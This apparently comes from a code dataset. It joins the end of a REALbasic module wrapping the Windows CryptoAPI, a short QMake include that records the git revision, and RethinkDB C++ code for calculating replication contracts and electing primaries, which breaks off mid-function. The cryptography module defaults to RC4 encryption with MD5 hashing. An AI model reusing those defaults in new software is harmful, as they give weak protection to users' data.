mPasswordHashHandle = 0
mEncryptionKey = 0
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub EncryptChunk(data as String)
#if TargetWin32
dim done as Boolean
done = (data = "")
// Make sure that we have an encryption key
if mEncryptionKey = 0 then
MsgBox "No encryption key"
return
end
// RB 5.5 and before are horrible about MemoryBlocks that
// are nil. It sucks. So we need to code for that. So what we'll do is
// declare the function as an Integer and then use a helper function
// to convert a MemoryBlock into an integer
// We want to encrypt this chunk of data
Declare Function CryptEncrypt Lib "AdvApi32" ( _
key as Integer, hash as Integer, final as Boolean, _
flags as Integer, data as Integer, ByRef dataLen as Integer, _
bufLen as Integer ) as Integer
// Stuff it into a memory block
dim dataLength as Integer = LenB( data )
dim ret as Integer
// Now we make a buffer large enough to hold the
// encrypted data
dim encryptedData as Integer
dim mb as MemoryBlock
if dataLength > 0 then
mb = new MemoryBlock( dataLength )
mb = data
encryptedData = MakeMemoryBlockAsInteger( mb )
end
// And encrypt
ret = CryptEncrypt( mEncryptionKey, 0, done, 0, encryptedData, dataLength, dataLength )
Declare Function GetLastError Lib "Kernel32" () as Integer
if ret = 0 then
MsgBox "Couldn't encrypt the data: 0x " + Hex( GetLastError )
return
end
// And add the new chunk of encrypted data to
// our ongoing data
AppendDataChunkToBuffer( MemoryBlockFromInteger( encryptedData ), dataLength )
#else
#pragma unused data
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub EndDecryption()
// We want to finish the decryption process
DecryptChunk( "" )
DestroyHashAndKey
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub EndEncryption()
// We need to do one last encryption where
// we pass in no data to signify that we're done
EncryptChunk( "" )
DestroyHashAndKey
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub Finalize()
#if TargetWin32
Declare Function CryptReleaseContext Lib "AdvApi32" ( _
provider as Integer, flags as Integer ) as Integer
dim ret as Integer
ret = CryptReleaseContext( mProvider, 0 )
if ret = 0 then
MsgBox "Could not release the provider context"
end
mProvider = 0
#endif
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Function GetDecryptedData() As String
return mBuffer
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Function GetEncryptedData() As MemoryBlock
return mBuffer
End Function
#tag EndMethod
#tag Method, Flags = &h21
Private Function HashData(provider as Integer, data as String, ByRef handle as Integer) As MemoryBlock
#if TargetWin32
// Now we need a hash of the data
Declare Function CryptCreateHash Lib "AdvApi32" ( _
provider as Integer, algorithm as Integer, key as Integer, _
flags as Integer, ByRef hashHandle as Integer ) as Integer
'Const ALG_CLASS_HASH = (4 << 13)
'Const ALG_TYPE_ANY = 0
'Const ALG_SID_MD5 = 3
Const CALG_MD5 = 32771' (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_MD5)
Const HP_HASHVAL = &h0002 // Hash value
Const HP_HASHSIZE = &h0004 // Hash value size
// Get the hash handle
dim hashHandle, ret as Integer
ret = CryptCreateHash( provider, mHashAlgorithm, 0, 0, hashHandle )
if ret = 0 then
MsgBox "Couldn't create the hash"
return nil
end
// And actually hash the data
Declare Function CryptHashData Lib "AdvApi32" ( _
hashHandle as Integer, data as Ptr, length as Integer, _
flags as Integer ) as Integer
dim dataPtr as new MemoryBlock( Len( data ) )
dataPtr = data
ret = CryptHashData( hashHandle, dataPtr, dataPtr.Size, 0 )
if ret = 0 then
MsgBox "Couldn't hash data"
return nil
end
// Now we want to get the hash value back
Declare Function CryptGetHashParam Lib "AdvApi32" ( _
hashHandle as Integer, type as Integer, value as Ptr, _
ByRef length as Integer, flags as Integer ) as Integer
dim size as Integer = 4
dim toss as new MemoryBlock( 4 )
ret = CryptGetHashParam( hashHandle, HP_HASHSIZE, toss, _
size, 0 )
if ret = 0 then
MsgBox "Couldn't get the hash value size"
return nil
end
size = toss.Long( 0 )
// Allocate a buffer to hold the data
dim hashValue as new MemoryBlock( size )
// And get the actual hash value
ret = CryptGetHashParam( hashHandle, HP_HASHVAL, hashValue, _
size, 0 )
if ret = 0 then
MsgBox "Couldn't get the hash value itself"
return nil
end
handle = hashHandle
return hashValue
#else
#pragma unused provider
#pragma unused data
#pragma unused handle
#endif
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Function HashData(data as String) As MemoryBlock
dim toss as Integer
dim ret as MemoryBlock
ret = HashData( mProvider, data, toss )
// Free our hash handle
Declare Sub CryptDestroyHash Lib "AdvApi32" ( _
hashHandle as Integer )
CryptDestroyHash( toss )
return ret
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Function Initialize() As Boolean
#if TargetWin32
Soft Declare Function CryptAcquireContextA Lib "AdvApi32" ( _
ByRef provider as Integer, container as Integer, _
providerName as CString, providerType as Integer, _
flags as Integer ) as Integer
Soft Declare Function CryptAcquireContextW Lib "AdvApi32" ( _
ByRef provider as Integer, container as Integer, _
providerName as WString, providerType as Integer, _
flags as Integer ) as Integer
// First, get the provider
dim ret as Integer
Const MS_DEF_PROV = "Microsoft Base Cryptographic Provider v1.0"
Const PROV_RSA_FULL = 1
Const CRYPT_NEWKEYSET = &h00000008
if System.IsFunctionAvailable( "CryptAcquireContextW", "AdvApi32" ) then
ret = CryptAcquireContextW( mProvider, 0, MS_DEF_PROV, PROV_RSA_FULL, 0 )
else
ret = CryptAcquireContextA( mProvider, 0, MS_DEF_PROV, PROV_RSA_FULL, 0 )
end if
if ret = 0 then
// Couldn't acquire the context, so try again with a new keyset
if System.IsFunctionAvailable( "CryptAcquireContextW", "AdvApi32" ) then
ret = CryptAcquireContextW( mProvider, 0, MS_DEF_PROV, PROV_RSA_FULL, CRYPT_NEWKEYSET )
else
ret = CryptAcquireContextA( mProvider, 0, MS_DEF_PROV, PROV_RSA_FULL, CRYPT_NEWKEYSET )
end if
if ret = 0 then
MsgBox "0x" + Hex( Win32DeclareLibraryWFS.GetLastError )
// We really can't do anything right, can we?
return false
end if
end
mCryptoAlgorithm = kCryptoTypeRC4
mHashAlgorithm = kHashTypeMD5
return true
#endif
End Function
#tag EndMethod
#tag Method, Flags = &h21
Private Function MakeMemoryBlockAsInteger(data as MemoryBlock) As Integer
dim ret as new MemoryBlock( 4 )
ret.Ptr( 0 ) = data
return ret.Long( 0 )
End Function
#tag EndMethod
#tag Method, Flags = &h21
Private Function MemoryBlockFromInteger(mb as Integer) As MemoryBlock
dim ret as new MemoryBlock( 4 )
ret.Long( 0 ) = mb
return ret.Ptr( 0 )
End Function
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub UseCryptoAlgorithm(algo as Integer)
mCryptoAlgorithm = algo
End Sub
#tag EndMethod
#tag Method, Flags = &h1
Protected Sub UseHashAlgorithm(algo as Integer)
mHashAlgorithm = algo
End Sub
#tag EndMethod
#tag Property, Flags = &h21
Private mBlockLength As Integer
#tag EndProperty
#tag Property, Flags = &h21
Private mBuffer As MemoryBlock
#tag EndProperty
#tag Property, Flags = &h21
Private mCryptoAlgorithm As Integer
#tag EndProperty
#tag Property, Flags = &h21
Private mEncryptionKey As Integer
#tag EndProperty
#tag Property, Flags = &h21
Private mHashAlgorithm As Integer
#tag EndProperty
#tag Property, Flags = &h21
Private mPasswordHashHandle As Integer
#tag EndProperty
#tag Property, Flags = &h21
Private mProvider As Integer
#tag EndProperty
#tag Constant, Name = kCryptoTypeRC4, Type = Integer, Dynamic = False, Default = \"26625", Scope = Protected
#tag EndConstant
#tag Constant, Name = kHashTypeHMAC, Type = Integer, Dynamic = False, Default = \"32777", Scope = Protected
#tag EndConstant
#tag Constant, Name = kHashTypeMAC, Type = Integer, Dynamic = False, Default = \"32773", Scope = Protected
#tag EndConstant
#tag Constant, Name = kHashTypeMD2, Type = Integer, Dynamic = False, Default = \"32769", Scope = Protected
#tag EndConstant
#tag Constant, Name = kHashTypeMD4, Type = Integer, Dynamic = False, Default = \"32770", Scope = Protected
#tag EndConstant
#tag Constant, Name = kHashTypeMD5, Type = Integer, Dynamic = False, Default = \"32771", Scope = Protected
#tag EndConstant
#tag Constant, Name = kHashTypeSHA, Type = Integer, Dynamic = False, Default = \"32772", Scope = Protected
#tag EndConstant
#tag Constant, Name = kHashTypeSHAMD5, Type = Integer, Dynamic = False, Default = \"32776", Scope = Protected
#tag EndConstant
#tag ViewBehavior
#tag ViewProperty
Name="Index"
Visible=true
Group="ID"
InitialValue="-2147483648"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Left"
Visible=true
Group="Position"
InitialValue="0"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Name"
Visible=true
Group="ID"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Super"
Visible=true
Group="ID"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Top"
Visible=true
Group="Position"
InitialValue="0"
InheritedFrom="Object"
#tag EndViewProperty
#tag EndViewBehavior
End Module
#tag EndModule
| REALbasic | 5 | bskrtich/WFS | Windows Functionality Suite/Miscellaneous/Modules/CryptographyWFS.rbbas | [
"MIT"
] |
# QMake include file that calls some functions
# and does nothing else...
exists(.git/HEAD) {
system(git rev-parse HEAD >rev.txt)
} else {
system(echo ThisIsNotAGitRepo >rev.txt)
}
| QMake | 3 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/QMake/functions.pri | [
"MIT"
] |
// Copyright 2010-2015 RethinkDB, all rights reserved.
#include "clustering/table_contract/coordinator/calculate_contracts.hpp"
#include "clustering/table_contract/branch_history_gc.hpp"
#include "clustering/table_contract/cpu_sharding.hpp"
#include "logger.hpp"
/* A `contract_ack_t` is not necessarily homogeneous. It may have different `version_t`s
for different regions, and a region with a single `version_t` may need to be split
further depending on the branch history. Since `calculate_contract()` assumes it's
processing a homogeneous input, we need to break the `contract_ack_t` into homogeneous
pieces. `contract_ack_frag_t` is like a homogeneous version of `contract_ack_t`; in place
of the `region_map_t<version_t>` it has a single `state_timestamp_t`. Use
`break_ack_into_fragments()` to convert a `contract_ack_t` into a
`region_map_t<contract_ack_frag_t>`. */
class contract_ack_frag_t {
public:
bool operator==(const contract_ack_frag_t &x) const {
return state == x.state && version == x.version &&
common_ancestor == x.common_ancestor && branch == x.branch;
}
bool operator!=(const contract_ack_frag_t &x) const {
return !(*this == x);
}
/* `state` and `branch` are the same as the corresponding fields of the original
`contract_ack_t` */
contract_ack_t::state_t state;
optional<branch_id_t> branch;
/* `version` is the value of the `version` field of the original `contract_ack_t` for
the specific sub-region this fragment applies to. */
optional<version_t> version;
/* `common_ancestor` is the timestamp of the last common ancestor of the original
`contract_ack_t` and the `current_branch` in the Raft state for the specific
sub-region this fragment applies to. If `version` is blank, this will always be
blank; if `version` is present, `common_ancestor` might or might not be blank
depending on whether we expect to use the value. */
optional<state_timestamp_t> common_ancestor;
};
region_map_t<contract_ack_frag_t> break_ack_into_fragments(
const region_t ®ion,
const contract_ack_t &ack,
const region_map_t<branch_id_t> ¤t_branches,
const branch_history_reader_t *raft_branch_history,
bool compute_common_ancestor) {
contract_ack_frag_t base_frag;
base_frag.state = ack.state;
base_frag.branch = ack.branch;
if (!static_cast<bool>(ack.version)) {
return region_map_t<contract_ack_frag_t>(region, base_frag);
} else if (compute_common_ancestor) {
branch_history_combiner_t combined_branch_history(
raft_branch_history, &ack.branch_history);
/* Fragment over branches and then over versions within each branch. */
return ack.version->map_multi(region,
[&](const region_t &ack_version_reg, const version_t &vers) {
base_frag.version = make_optional(vers);
return current_branches.map_multi(ack_version_reg,
[&](const region_t &branch_reg, const branch_id_t &branch) {
region_map_t<version_t> points_on_canonical_branch;
try {
points_on_canonical_branch =
version_find_branch_common(&combined_branch_history,
vers, branch, branch_reg);
} catch (const missing_branch_exc_t &) {
#ifndef NDEBUG
crash("Branch history is incomplete");
#else
logERR("The branch history is incomplete. This probably means "
"that there is a bug in RethinkDB. Please report this "
"at https://github.com/rethinkdb/rethinkdb/issues/ .");
/* Recover by using the root branch */
points_on_canonical_branch =
region_map_t<version_t>(region_t::universe(),
version_t::zero());
#endif
}
return points_on_canonical_branch.map(branch_reg,
[&](const version_t &common_vers) {
base_frag.common_ancestor =
make_optional(common_vers.timestamp);
return base_frag;
});
});
});
} else {
return ack.version->map(region,
[&](const version_t &vers) {
base_frag.version = make_optional(vers);
return base_frag;
});
}
}
/* `invisible_to_majority_of_set()` returns `true` if `target` definitely cannot be seen
by a majority of the servers in `judges`. If we can't see one of the servers in `judges`,
we'll assume it can see `target` to reduce spurious failoves. */
bool invisible_to_majority_of_set(
const server_id_t &target,
const std::set<server_id_t> &judges,
watchable_map_t<std::pair<server_id_t, server_id_t>, empty_value_t> *
connections_map) {
size_t count = 0;
for (const server_id_t &s : judges) {
if (connections_map->get_key(std::make_pair(s, target)).has_value() ||
!connections_map->get_key(std::make_pair(s, s)).has_value()) {
++count;
}
}
return !(count > judges.size() / 2);
}
/* A small helper function for `calculate_contract()` to test whether a given
replica is currently streaming. */
bool is_streaming(
const contract_t &old_c,
const std::map<server_id_t, contract_ack_frag_t> &acks,
server_id_t server) {
auto it = acks.find(server);
if (it != acks.end() &&
(it->second.state == contract_ack_t::state_t::secondary_streaming ||
(static_cast<bool>(old_c.primary) &&
old_c.primary->server == server))) {
return true;
} else {
return false;
}
}
/* `calculate_contract()` calculates a new contract for a region. Whenever any of the
inputs changes, the coordinator will call `update_contract()` to compute a contract for
each range of keys. The new contract will often be the same as the old, in which case it
doesn't get a new contract ID. */
contract_t calculate_contract(
/* The old contract that contains this region. */
const contract_t &old_c,
/* The user-specified configuration for the shard containing this region. */
const table_config_t::shard_t &config,
/* Contract acks from replicas regarding `old_c`. If a replica hasn't sent us an
ack *specifically* for `old_c`, it won't appear in this map; we don't include
acks for contracts that were in the same region before `old_c`. */
const std::map<server_id_t, contract_ack_frag_t> &acks,
/* This `watchable_map_t` will have an entry for (X, Y) if we can see server X
and server X can see server Y. */
watchable_map_t<std::pair<server_id_t, server_id_t>, empty_value_t> *
connections_map) {
contract_t new_c = old_c;
/* If there are new servers in `config.all_replicas`, add them to `c.replicas` */
new_c.replicas.insert(config.all_replicas.begin(), config.all_replicas.end());
/* If there is a mismatch between `config.voting_replicas()` and `c.voters`, then
add and/or remove voters until both sets match.
There are three important restrictions we have to consider here:
1. We should not remove voters if that would reduce the total number of voters
below the minimum of the size of the current voter set and the size of the
configured voter set. Consider the case where a user wants to replace
a few replicas by different ones. Without this restriction, we would often
remove all the old replicas from the voters set before enough of the new
replicas would become streaming to replace them.
2. To increase availability in some scenarios, we also don't remove replicas
if that would mean being left with less than a majority of streaming
replicas.
3. Only replicas that are streaming are guaranteed to have a complete branch
history. Once we make a replica voting, some parts of our logic assume that
the branch history is intact (most importantly our call to
`break_ack_into_fragments()` in `calculate_all_contracts()`).
To avoid this condition, we only add a replica to the voters list after it
has started streaming.
See https://github.com/rethinkdb/rethinkdb/issues/4866 for more details. */
std::set<server_id_t> config_voting_replicas = config.voting_replicas();
if (!static_cast<bool>(old_c.temp_voters) &&
old_c.voters != config_voting_replicas) {
bool voters_changed = false;
std::set<server_id_t> new_voters = old_c.voters;
/* Step 1: Check if we can add any voters */
for (const server_id_t &server : config_voting_replicas) {
if (old_c.voters.count(server)) {
/* The replica is already a voter */
continue;
}
if (is_streaming(old_c, acks, server)) {
/* The replica is streaming. We can add it to the voter set. */
new_voters.insert(server);
voters_changed = true;
}
}
/* Step 2: Remove voters */
/* We try to remove non-streaming replicas first before we start removing
streaming ones to maximize availability in case a replica fails. */
std::list<server_id_t> to_remove;
for (const server_id_t &server : new_voters) {
if (config_voting_replicas.count(server) > 0) {
/* The replica should remain a voter */
continue;
}
if (is_streaming(old_c, acks, server)) {
/* The replica is streaming. Put it at the end of the `to_remove`
list. */
to_remove.push_back(server);
} else {
/* The replica is not streaming. Removing it doesn't hurt
availability, so we put it at the front of the `to_remove` list. */
to_remove.push_front(server);
}
}
size_t num_streaming = 0;
for (const server_id_t &server : new_voters) {
if (is_streaming(old_c, acks, server)) {
++num_streaming;
}
}
size_t min_voters_size = std::min(old_c.voters.size(),
config_voting_replicas.size());
for (const server_id_t &server_to_remove : to_remove) {
/* Check if we can remove more voters without going below
`min_voters_size`, and without losing a majority of streaming voters. */
size_t remaining_streaming = is_streaming(old_c, acks, server_to_remove)
? num_streaming - 1
: num_streaming;
size_t remaining_total = new_voters.size() - 1;
bool would_lose_majority = remaining_streaming <= remaining_total / 2;
if (would_lose_majority || new_voters.size() <= min_voters_size) {
break;
}
new_voters.erase(server_to_remove);
voters_changed = true;
}
/* Step 3: If anything changed, stage the new voter set into `temp_voters` */
rassert(voters_changed == (old_c.voters != new_voters));
if (voters_changed) {
new_c.temp_voters.set(new_voters);
}
}
/* If we already initiated a voter change by setting `temp_voters`, it might be time
to commit that change by setting `voters` to `temp_voters`. */
if (static_cast<bool>(old_c.temp_voters)) {
/* Before we change `voters`, we have to make sure that we'll preserve the
invariant that every acked write is on a majority of `voters`. This is mostly the
job of the primary; it will not report `primary_ready` unless it is requiring
acks from a majority of both `voters` and `temp_voters` before acking writes to
the client, *and* it has ensured that every write that was acked before that
policy was implemented has been backfilled to a majority of `temp_voters`. So we
can't switch voters unless the primary reports `primary_ready`.
See `primary_execution_t::is_contract_ackable` for the detailed semantics of
the `primary_ready` state. */
if (static_cast<bool>(old_c.primary) &&
acks.count(old_c.primary->server) == 1 &&
acks.at(old_c.primary->server).state ==
contract_ack_t::state_t::primary_ready) {
/* The `acks` we just checked are based on `old_c`, so we really shouldn't
commit any different set of `temp_voters`. */
guarantee(new_c.temp_voters == old_c.temp_voters);
/* OK, it's safe to commit. */
new_c.voters = *new_c.temp_voters;
new_c.temp_voters.reset();
}
}
/* `visible_voters` includes all members of `voters` and `temp_voters` which could be
visible to a majority of `voters` (and `temp_voters`, if `temp_voters` exists). Note
that if the coordinator can't see server X, it will assume server X can see every
other server; this reduces spurious failovers when the coordinator loses contact with
other servers. */
std::set<server_id_t> visible_voters;
for (const server_id_t &server : new_c.replicas) {
if (new_c.voters.count(server) == 0 &&
(!static_cast<bool>(new_c.temp_voters) ||
new_c.temp_voters->count(server) == 0)) {
continue;
}
if (invisible_to_majority_of_set(server, new_c.voters, connections_map)) {
continue;
}
if (static_cast<bool>(new_c.temp_voters)) {
if (invisible_to_majority_of_set(
server, *new_c.temp_voters, connections_map)) {
continue;
}
}
visible_voters.insert(server);
}
/* If a server was removed from `config.replicas` and `c.voters` but it's still in
`c.replicas`, then remove it. And if it's primary, then make it not be primary. */
bool should_kill_primary = false;
for (const server_id_t &server : old_c.replicas) {
if (config.all_replicas.count(server) == 0 &&
new_c.voters.count(server) == 0 &&
(!static_cast<bool>(new_c.temp_voters) ||
new_c.temp_voters->count(server) == 0)) {
new_c.replicas.erase(server);
if (static_cast<bool>(old_c.primary) && old_c.primary->server == server) {
/* Actual killing happens further down */
should_kill_primary = true;
}
}
}
/* If we don't have a primary, choose a primary. Servers are not eligible to be a
primary unless they are carrying every acked write. There will be at least one
eligible server if and only if we have reports from a majority of `new_c.voters`.
In addition, we must choose `config.primary_replica` if it is eligible. If
`config.primary_replica` has not sent an ack, we must wait for the failover timeout
to elapse before electing a different replica. This is to make sure that we won't
elect the wrong replica simply because the user's designated primary took a little
longer to send the ack. */
if (!static_cast<bool>(old_c.primary) && !old_c.after_emergency_repair) {
/* We have an invariant that every acked write must be on the path from the root
of the branch history to `old_c.branch`. So we project each voter's state onto
that path, then sort them by position along the path. Any voter that is at least
as up to date, according to that metric, as more than half of the voters
(including itself) is eligible. We also take into account whether a server is
visible to its peers when deciding which server to select. */
/* First, collect the states from the servers, and sort them by how up-to-date
they are. Note that we use the server ID as a secondary sorting key. This mean we
tend to pick the same server if we run the algorithm twice; this helps to reduce
unnecessary fragmentation. */
std::vector<std::pair<state_timestamp_t, server_id_t> > sorted_candidates;
for (const server_id_t &server : new_c.voters) {
if (acks.count(server) == 1 && acks.at(server).state ==
contract_ack_t::state_t::secondary_need_primary) {
sorted_candidates.push_back(
std::make_pair(*(acks.at(server).common_ancestor), server));
}
}
std::sort(sorted_candidates.begin(), sorted_candidates.end());
/* Second, determine which servers are eligible to become primary on the basis of
their data and their visibility to their peers. */
std::vector<server_id_t> eligible_candidates;
for (size_t i = 0; i < sorted_candidates.size(); ++i) {
server_id_t server = sorted_candidates[i].second;
/* If the server is not visible to more than half of its peers, then it is
not eligible to be primary */
if (visible_voters.count(server) == 0) {
continue;
}
/* `up_to_date_count` is the number of servers that `server` is at least as
up-to-date as. We know `server` must be at least as up-to-date as itself and
all of the servers that are earlier in the list. */
size_t up_to_date_count = i + 1;
/* If there are several servers with the same timestamp, they will appear
together in the list. So `server` may be at least as up-to-date as some of
the servers that appear after it in the list. */
while (up_to_date_count < sorted_candidates.size() &&
sorted_candidates[up_to_date_count].first ==
sorted_candidates[i].first) {
++up_to_date_count;
}
/* OK, now `up_to_date_count` is the number of servers that this server is
at least as up-to-date as. */
if (up_to_date_count > new_c.voters.size() / 2) {
eligible_candidates.push_back(server);
}
}
/* OK, now we can pick a primary. */
auto it = std::find(eligible_candidates.begin(), eligible_candidates.end(),
config.primary_replica);
if (it != eligible_candidates.end()) {
/* The user's designated primary is eligible, so use it. */
contract_t::primary_t p;
p.server = config.primary_replica;
new_c.primary.set(p);
} else if (!eligible_candidates.empty()) {
/* The user's designated primary is ineligible. We have to decide if we'll
wait for the user's designated primary to become eligible, or use one of the
other eligible candidates. */
if (!config.primary_replica.get_uuid().is_nil() &&
visible_voters.count(config.primary_replica) == 1 &&
acks.count(config.primary_replica) == 0) {
/* The user's designated primary is visible to a majority of its peers,
and the only reason it was disqualified is because we haven't seen an ack
from it yet. So we'll wait for it to send in an ack rather than electing
a different primary. */
} else {
/* We won't wait for it. */
contract_t::primary_t p;
/* `eligible_candidates` is ordered by how up-to-date they are */
p.server = eligible_candidates.back();
new_c.primary.set(p);
}
}
} else if (!static_cast<bool>(old_c.primary) && old_c.after_emergency_repair) {
/* If we recently completed an emergency repair operation, we use a different
procedure to pick the primary: we require all voters to be present, and then we
pick the voter with the highest version, regardless of `current_branch`. The
reason we can't take `current_branch` into account is that the emergency repair
might create gaps in the branch history, so we can't reliably compute each
replica's position on `current_branch`. The reason we require all replicas to be
present is to make the emergency repair safer. For example, imagine if a table
has three voters, A, B, and C. Suppose that voter B is lagging behind the others,
and voter C is removed by emergency repair. Then the normal algorithm could pick
voter B as the primary, even though it's missing some data. */
server_id_t best_primary = server_id_t::from_server_uuid(nil_uuid());
state_timestamp_t best_timestamp = state_timestamp_t::zero();
bool all_present = true;
for (const server_id_t &server : new_c.voters) {
if (acks.count(server) == 1 && acks.at(server).state ==
contract_ack_t::state_t::secondary_need_primary) {
state_timestamp_t timestamp = acks.at(server).version->timestamp;
if (best_primary.get_uuid().is_nil() || timestamp > best_timestamp) {
best_primary = server;
best_timestamp = timestamp;
}
} else {
all_present = false;
break;
}
}
if (all_present) {
contract_t::primary_t p;
p.server = best_primary;
new_c.primary.set(p);
}
}
/* Sometimes we already have a primary, but we need to pick a different one. There
are three such situations:
- The existing primary is disconnected
- The existing primary isn't `config.primary_replica`, and `config.primary_replica`
is ready to take over the role
- `config.primary_replica` isn't ready to take over the role, but the existing
primary isn't even supposed to be a replica anymore.
In the first situation, we'll simply remove `c.primary`. In the second and third
situations, we'll first set `c.primary->warm_shutdown` to `true`, and then only
once the primary acknowledges that, we'll remove `c.primary`. Either way, once the
replicas acknowledge the contract in which we removed `c.primary`, the logic earlier
in this function will select a new primary. Note that we can't go straight from the
old primary to the new one; we need a majority of replicas to promise to stop
receiving updates from the old primary before it's safe to elect a new one. */
if (static_cast<bool>(old_c.primary)) {
/* Note we already checked for the case where the old primary wasn't supposed to
be a replica. If this is so, then `should_kill_primary` will already be set to
`true`. */
/* Check if we need to do an auto-failover. The precise form of this condition
isn't important for correctness. If we do an auto-failover when the primary isn't
actually dead, or don't do an auto-failover when the primary is actually dead,
the worst that will happen is we'll lose availability. */
if (!should_kill_primary && visible_voters.count(old_c.primary->server) == 0) {
should_kill_primary = true;
}
if (should_kill_primary) {
new_c.primary.reset();
} else if (old_c.primary->server != config.primary_replica) {
/* The old primary is still a valid replica, but it isn't equal to
`config.primary_replica`. So we have to do a hand-over to ensure that after
we kill the primary, `config.primary_replica` will be a valid candidate. */
if (old_c.primary->hand_over !=
make_optional(config.primary_replica)) {
/* We haven't started the hand-over yet, or we're in the middle of a
hand-over to a different primary. */
if (acks.count(config.primary_replica) == 1 &&
acks.at(config.primary_replica).state ==
contract_ack_t::state_t::secondary_streaming &&
visible_voters.count(config.primary_replica) == 1) {
/* The new primary is ready, so begin the hand-over. */
new_c.primary->hand_over.set(config.primary_replica);
} else {
/* We're not ready to switch to the new primary yet. */
if (static_cast<bool>(old_c.primary->hand_over)) {
/* We were in the middle of a hand over to a different primary,
and then the user changed `config.primary_replica`. But the new
primary isn't ready yet, so cancel the old hand-over. (This is
very uncommon.) */
new_c.primary->hand_over.reset();
}
}
} else {
/* We're already in the process of handing over to the new primary. */
if (acks.count(old_c.primary->server) == 1 &&
acks.at(old_c.primary->server).state ==
contract_ack_t::state_t::primary_ready) {
/* The hand over is complete. Now it's safe to stop the old primary.
The new primary will be started later, after a majority of the
replicas acknowledge that they are no longer listening for writes
from the old primary.
See `primary_execution_t::is_contract_ackable` for a detailed
explanation of what the `primary_ready` state implies. */
new_c.primary.reset();
} else if (visible_voters.count(config.primary_replica) == 0) {
/* Something went wrong with the new primary before the hand-over was
complete. So abort the hand-over. */
new_c.primary->hand_over.reset();
}
}
} else {
if (static_cast<bool>(old_c.primary->hand_over)) {
/* We were in the middle of a hand over, but then the user changed
`config.primary_replica` back to what it was before. (This is very
uncommon.) */
new_c.primary->hand_over.reset();
}
}
}
return new_c;
}
/* `calculate_all_contracts()` is sort of like `calculate_contract()` except that it
applies to the whole set of contracts instead of to a single contract. It takes the
inputs that `calculate_contract()` needs, but in sharded form; then breaks the key space
into small enough chunks that the inputs are homogeneous across each chunk; then calls
`calculate_contract()` on each chunk.
The output is in the form of a diff instead of a set of new contracts. We need a diff to
put in the `table_raft_state_t::change_t::new_contracts_t`, and we need to compute the
diff anyway in order to reuse contract IDs for contracts that haven't changed, so it
makes sense to combine those two diff processes. */
void calculate_all_contracts(
const table_raft_state_t &old_state,
const std::map<contract_id_t, std::map<server_id_t, contract_ack_t> > &acks,
watchable_map_t<std::pair<server_id_t, server_id_t>, empty_value_t>
*connections_map,
std::set<contract_id_t> *remove_contracts_out,
std::map<contract_id_t, std::pair<region_t, contract_t> > *add_contracts_out,
std::map<region_t, branch_id_t> *register_current_branches_out,
std::set<branch_id_t> *remove_branches_out,
branch_history_t *add_branches_out) {
ASSERT_FINITE_CORO_WAITING;
/* Initially, we put every branch into `remove_branches_out`. Then as we process
contracts, we "mark branches live" by removing them from `remove_branches_out`. */
for (const auto &pair : old_state.branch_history.branches) {
remove_branches_out->insert(pair.first);
}
std::vector<region_t> new_contract_region_vector;
std::vector<contract_t> new_contract_vector;
/* We want to break the key-space into sub-regions small enough that the contract,
table config, and ack versions are all constant across the sub-region. First we
iterate over all contracts: */
for (const std::pair<contract_id_t, std::pair<region_t, contract_t> > &cpair :
old_state.contracts) {
/* Next iterate over all shards of the table config and find the ones that
overlap the contract in question: */
for (size_t shard_index = 0; shard_index < old_state.config.config.shards.size();
++shard_index) {
region_t region = region_intersection(
cpair.second.first,
region_t(old_state.config.shard_scheme.get_shard_range(shard_index)));
if (region_is_empty(region)) {
continue;
}
/* Find acks for this contract. If there aren't any acks for this contract,
then `acks` might not even have an empty map, so we need to construct an
empty map in that case. */
const std::map<server_id_t, contract_ack_t> *this_contract_acks;
{
static const std::map<server_id_t, contract_ack_t> empty_ack_map;
auto it = acks.find(cpair.first);
this_contract_acks = (it == acks.end()) ? &empty_ack_map : &it->second;
}
/* Now collect the acks for this contract into `ack_frags`. `ack_frags` is
homogeneous at first and then it gets fragmented as we iterate over `acks`.
*/
region_map_t<std::map<server_id_t, contract_ack_frag_t> > frags_by_server(
region);
for (const auto &pair : *this_contract_acks) {
/* Sanity-check the ack */
DEBUG_ONLY_CODE(pair.second.sanity_check(
pair.first, cpair.first, old_state));
/* There are two situations where we don't compute the common ancestor:
1. If the server sending the ack is not in `voters` or `temp_voters`
2. If the contract has the `after_emergency_repair` flag set
In these situations, we don't need the common ancestor, but computing it
might be dangerous because the branch history might be incomplete. */
bool compute_common_ancestor =
(cpair.second.second.voters.count(pair.first) == 1 ||
(static_cast<bool>(cpair.second.second.temp_voters) &&
cpair.second.second.temp_voters->count(pair.first) == 1)) &&
!cpair.second.second.after_emergency_repair;
region_map_t<contract_ack_frag_t> frags = break_ack_into_fragments(
region, pair.second, old_state.current_branches,
&old_state.branch_history, compute_common_ancestor);
frags.visit(region,
[&](const region_t ®, const contract_ack_frag_t &frag) {
frags_by_server.visit_mutable(reg,
[&](const region_t &,
std::map<server_id_t, contract_ack_frag_t> *acks_map) {
auto res = acks_map->insert(
std::make_pair(pair.first, frag));
guarantee(res.second);
});
});
}
frags_by_server.visit(region,
[&](const region_t ®,
const std::map<server_id_t, contract_ack_frag_t> &acks_map) {
/* We've finally collected all the inputs to `calculate_contract()` and
broken the key space into regions across which the inputs are
homogeneous. So now we can actually call it. */
const contract_t &old_contract = cpair.second.second;
contract_t new_contract = calculate_contract(
old_contract,
old_state.config.config.shards[shard_index],
acks_map,
connections_map);
/* Register a branch if a primary is asking us to */
optional<branch_id_t> registered_new_branch;
if (static_cast<bool>(old_contract.primary) &&
static_cast<bool>(new_contract.primary) &&
old_contract.primary->server ==
new_contract.primary->server &&
acks_map.count(old_contract.primary->server) == 1 &&
acks_map.at(old_contract.primary->server).state ==
contract_ack_t::state_t::primary_need_branch) {
branch_id_t to_register =
